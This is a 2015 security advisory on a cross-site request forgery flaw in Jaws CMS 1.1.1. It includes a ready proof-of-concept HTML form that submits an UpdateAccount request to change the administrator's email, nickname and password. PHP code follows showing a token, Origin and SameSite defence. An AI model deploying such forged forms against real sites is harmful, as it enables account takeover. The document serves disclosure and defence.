
Jaws 1.1.1 Cross Site Request Forgery

Posted on 15 April 2015

# Affected software: Jaws CMS
# Type of vulnerability: CSRF
# URL: http://www.opensourcecms.com/scripts/details.php?scriptid=38&name=Jaws
# Discovered by: provensec
# Website: provensec.com
# Version: Jaws 1.1.1

# Proof of concept

<html>
  <body>
    <form action="http://demo.jaws-project.com/index.php" method="POST">
      <input type="hidden" name="gadget" value="Users" />
      <input type="hidden" name="action" value="UpdateAccount" />
      <input type="hidden" name="email" value="admin@example.org" />
      <input type="hidden" name="nickname" value="Jaws Administrator" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="password_check" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
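
The proof-of-concept form contains no unpredictable value tied to the logged-in user's session, so a server that accepts it cannot tell it apart from its own account form. The PHP below is an added example (not Jaws code and not part of the advisory) of a server-side gate that refuses such a request; the function names, the `csrf_token` field and the `https://cms.example` origin are assumptions, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; these are not Jaws functions.

/** Create a per-session token; the server embeds it in its own account form. */
function csrf_issue_token(array &$session): string
{
    $session['csrf_token'] = bin2hex(random_bytes(32));
    return $session['csrf_token'];
}

/** True only if the POST carries the token stored in this session. */
function csrf_token_ok(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($given) && $expected !== ''
        && hash_equals($expected, $given);   // constant-time comparison
}

/** Secondary check: if the browser sent an Origin header, it must be ours. */
function origin_ok(array $server, string $ownOrigin): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? null;
    return $origin === null || $origin === $ownOrigin;
}

/** Gate for a state-changing request such as action=UpdateAccount. */
function may_update_account(array $session, array $post, array $server, string $ownOrigin): bool
{
    return ($server['REQUEST_METHOD'] ?? '') === 'POST'
        && origin_ok($server, $ownOrigin)
        && csrf_token_ok($session, $post);
}

// --- Constructed sample data ---
$session = ['user' => 'admin'];
$token   = csrf_issue_token($session);
$own     = 'https://cms.example';            // placeholder origin (assumption)

// Same fields as the advisory's form: no token, sent from a foreign origin.
$forged = ['gadget' => 'Users', 'action' => 'UpdateAccount',
           'email' => 'admin@example.org', 'nickname' => 'Jaws Administrator',
           'password' => '', 'password_check' => ''];
var_dump(may_update_account($session, $forged,
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'], $own));

// The site's own form submission, which includes the issued token.
var_dump(may_update_account($session, $forged + ['csrf_token' => $token],
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $own], $own));
```

Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` adds a browser-side layer on top of the token check.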

 
